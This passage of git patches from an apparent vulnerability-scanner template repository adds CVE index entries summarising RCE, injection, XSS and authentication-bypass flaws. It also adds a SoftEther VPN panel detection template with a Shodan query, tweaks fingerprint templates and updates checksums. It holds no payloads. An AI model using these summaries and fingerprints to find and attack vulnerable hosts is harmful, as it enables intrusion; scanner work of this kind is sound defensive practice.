NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} @@ -2257,8 +2258,10 @@ {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} +{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"} {"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} +{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"} {"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"} {"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} @@ -2267,6 +2270,8 @@ {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} {"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"} {"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"} +{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"} +{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} @@ -2295,6 +2300,8 @@ {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} +{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} @@ -2307,6 +2314,9 @@ {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} +{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} +{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f16efa320f..fc1928fe0c 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d1c0809e63305403ca431401cfcebe07 +0718093f8377862f2723b488bb15e23a From 7868a182637e03082d20798583c4e48b0fd76a8d Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Wed, 20 Mar 2024 14:32:13 +0000 Subject: [PATCH 38/86] Create softether-vpn-panel.yaml --- http/exposed-panels/softether-vpn-panel.yaml | 28 ++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/exposed-panels/softether-vpn-panel.yaml diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml new file mode 100644 index 0000000000..3ec9615e2f --- /dev/null +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -0,0 +1,28 @@ +id: softether-vpn-panel + +info: + name: SoftEther VPN Panel - Detect + author: bhutch + severity: info + description: SoftEther VPN panel was detected. + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"SoftEther VPN Server" + tags: panel,vpn,softether + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SoftEther VPN Server" + + - type: status + status: + - 202 From e8b983ce786ddb7655c08a9bb4a0c8bdd56fc359 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Wed, 20 Mar 2024 14:43:33 +0000 Subject: [PATCH 39/86] Update fingerprinthub-web-fingerprints.yaml --- http/technologies/fingerprinthub-web-fingerprints.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index d2c5098ffb..e42e6eb61e 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -11440,6 +11440,7 @@ http: name: softether-vpn words: -
  • manage this vpn server or vpn bridge
      + case-insensitive: true - type: word name: softnext-spam From 752b0fbc3d0dfaf473b1990278acf6e482f3d6ec Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 20 Mar 2024 23:12:09 +0530 Subject: [PATCH 40/86] Update microsoft-iis-version.yaml --- http/technologies/microsoft/microsoft-iis-version.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index 7a85340474..ac03e25967 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -9,11 +9,14 @@ info: max-request: 1 tags: tech,microsoft,iis + http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 4 matchers-condition: and matchers: - type: word @@ -21,10 +24,6 @@ http: words: - "IIS" - - type: status - status: - - 200 - extractors: - type: kval part: header From afc3d77d80752f203f79db73090b33255fa86273 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:10 +0000 Subject: [PATCH 41/86] Auto Generated New Template Addition List [Wed Mar 20 17:44:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e60a673523..47df011d4e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ dns/soa-detect.yaml +dns/spf-record-detect.yaml dns/txt-service-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml From 1b191f5fc4d2361a13e2fdc6370ea336848d2603 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:44:22 +0000 Subject: [PATCH 42/86] Auto Generated Templates Checksum [Wed Mar 20 17:44:22 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6048164bfe..e2f8d3cfd0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -105,8 +105,8 @@ config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605 -cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4 +cves.json:3b21f179e553a113562af785def57c341b663071 +cves.json-checksum.txt:e03adc785e821e31dd4936f083dc56fbb0b302df dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -123,9 +123,10 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b +dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 -dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 +dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8 @@ -4536,7 +4537,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 -http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 +http/exposures/files/generic-db.yaml:36dc57f7db3eac512d56d7d54f0bb767cbb7fe88 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -6681,7 +6682,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 -http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 +http/technologies/wing-ftp-service-detect.yaml:0df5cbc14e688f4a21fb88751550ed2dc27e5497 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 @@ -8175,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f +templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2d38339db725bdb9c6035f8b2a6b7f9bd4111f7e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:52 +0000 Subject: [PATCH 43/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 52ff2ed46f..9f93d3bc1e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'dns/soa-detect.yaml' + - 'dns/spf-record-detect.yaml' - 'dns/txt-service-detect.yaml' - 'file/keys/dependency/dependency-track.yaml' - 'file/keys/docker/dockerhub-pat.yaml' From a61b8cb7f77b5b87f62a7ea5552d6e92f8ff2079 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 17:46:15 +0000 Subject: [PATCH 44/86] Auto Template Signing [Wed Mar 20 17:46:15 UTC 2024] :robot: --- dns/spf-record-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index c5583ab23a..7a9a051fd7 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -22,3 +22,4 @@ dns: - type: regex regex: - "v=spf1(.+)" +# digest: 4b0a00483046022100ada13ee531e36c1b45b196bafc39386d03ee223d98f9d0c3d3bd6f0609c6101202210099f776bb4a582a65c321385adc3d8fa9ec6f3047e658c38c6da98c89dd82c7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 603a75175f8e5ec5b0e62f06d5a1af95111c584d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:18:58 +0000 Subject: [PATCH 45/86] Auto Generated Templates Checksum [Wed Mar 20 18:18:58 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2f8d3cfd0..6ba563c418 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -123,7 +123,7 @@ dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b -dns/spf-record-detect.yaml:d284769413067e7c7fdfa930502a15242a628703 +dns/spf-record-detect.yaml:6aad264acb43bab9f128417e59b116cb7b35868e dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1 @@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292 +http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e70b10373bd2e373d9301a4b8dcb1c3b77889b1 +templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50de72defbbbc03e31c92014bfb93d37c5b60b06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 18:20:56 +0000 Subject: [PATCH 46/86] Auto Template Signing [Wed Mar 20 18:20:56 UTC 2024] :robot: --- http/technologies/fingerprinthub-web-fingerprints.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index afff283113..ca2ef4cc89 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -15065,4 +15065,4 @@ http: words: - "x-dispatcher:" case-insensitive: true -# digest: 4a0a00473045022100e202b5b8367df139a20f5ff3fced4c3ec57f5c5c98c2c42e3079952ccc4cf87502204d5331301337b21ea90535286f9393bc4140b0fde578aef1869201af8fca701e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 994d44ecf799788482d8950df621e2eceffca47c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:19:36 +0000 Subject: [PATCH 48/86] Auto Generated Templates Checksum [Wed Mar 20 